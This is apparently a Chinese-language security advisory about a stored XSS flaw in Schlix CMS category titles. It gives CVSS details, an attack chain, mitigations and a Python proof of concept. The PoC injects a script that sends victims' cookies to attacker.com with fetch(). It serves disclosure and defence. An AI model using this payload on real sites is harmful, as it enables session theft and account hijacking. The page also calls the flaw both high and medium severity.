CVE-2021-47834 Schlix CMS 持久型跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2021-47834

漏洞类型

持久型XSS

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Schlix CMS

漏洞概述

CVE-2021-47834是Schlix CMS 2.2.6-6版本中存在的一个高危持久型跨站脚本(XSS)漏洞。该漏洞由安全研究员通过VulnCheck平台披露，CVSS评分为6.4，属于中危级别。漏洞的核心问题在于应用程序对用户输入的分类标题(category titles)缺乏有效的输入验证和输出编码，允许经过身份验证的低权限用户在创建或编辑分类时注入恶意JavaScript代码。由于该脚本 payload 被存储在服务器端数据库中，当其他用户访问相关页面时，恶意代码将自动执行，形成存储型XSS攻击。攻击者可以利用此漏洞窃取受害者用户的会话cookie、劫持用户账户、进行钓鱼攻击或在受害者浏览器中执行任意操作。值得注意的是，该漏洞不需要受害者进行额外的交互操作，仅需访问包含恶意脚本的页面即可触发攻击，大大降低了攻击难度。由于Schlix CMS是一个广泛使用的开源内容管理系统，此次漏洞可能影响大量部署该系统的网站。

技术细节

该漏洞属于存储型跨站脚本(Stored XSS)漏洞，攻击向量为网络远程利用。漏洞存在于Schlix CMS的分类管理功能模块中，具体是在处理用户提交的分类标题参数时未进行充分的输入验证和HTML实体编码。攻击者首先需要拥有一个有效的Schlix CMS用户账户(即使是低权限账户)，然后通过CMS后台的分类创建或编辑功能，在分类标题字段中注入恶意JavaScript payload，例如:<script>alert(document.cookie)</script>或更复杂的窃取cookie脚本。该payload会被直接存储到数据库的分类表中，当系统其他用户访问显示分类列表的页面时，后端程序从数据库读取分类标题数据并直接输出到HTML页面中，恶意脚本随之被执行。CVSS向量AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N表明该漏洞可通过网络发起攻击，攻击复杂度低，需要低权限认证，无需用户交互即可触发，并会对机密性和完整性造成低等级影响。由于该XSS payload存储在服务端，攻击具有持久性，所有访问受影响页面的用户都会受到攻击。

攻击链分析

STEP 1

步骤1

攻击者获取Schlix CMS低权限用户账户，登录后台管理系统

STEP 2

步骤2

攻击者访问分类管理页面(/admin/categories/add)，在分类标题字段中注入恶意JavaScript代码

STEP 3

步骤3

系统将包含XSS payload的分类数据直接存储到数据库，未进行输入验证或HTML实体编码

STEP 4

步骤4

其他用户访问显示分类列表的前台页面时，后端从数据库读取分类标题并直接输出到HTML

STEP 5

步骤5

受害者浏览器解析HTML页面时执行注入的恶意脚本，攻击者成功窃取会话cookie或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2021-47834 PoC - Schlix CMS Stored XSS in Category Titles
# Authentication required (low-privilege user account)

import requests
import json

target_url = "http://target-site.com/schlix"
username = "attacker_account"
password = "attacker_password"

session = requests.Session()

# Step 1: Login to obtain session cookie
login_url = f"{target_url}/admin/login"
login_data = {
    "username": username,
    "password": password
}
response = session.post(login_url, data=login_data)

# Step 2: Create malicious category with XSS payload
category_url = f"{target_url}/admin/categories/add"
xss_payload = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>'
category_data = {
    "title": xss_payload,
    "description": "Malicious category for XSS attack"
}
response = session.post(category_url, data=category_data)

# The XSS payload is now stored and will execute when any user views the category page
print("XSS payload injected successfully")

影响范围

Schlix CMS 2.2.6-6

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1)限制用户创建分类的权限，仅允许管理员级别账户操作；2)在Web应用防火墙(WAF)层面配置XSS过滤规则，对<script>标签和JavaScript事件处理器进行拦截；3)对分类标题字段实施输入长度限制和字符类型限制；4)启用HTTPOnly和Secure标志保护Cookie，防止JavaScript访问；5)监控日志中的异常请求模式，及时发现潜在攻击行为。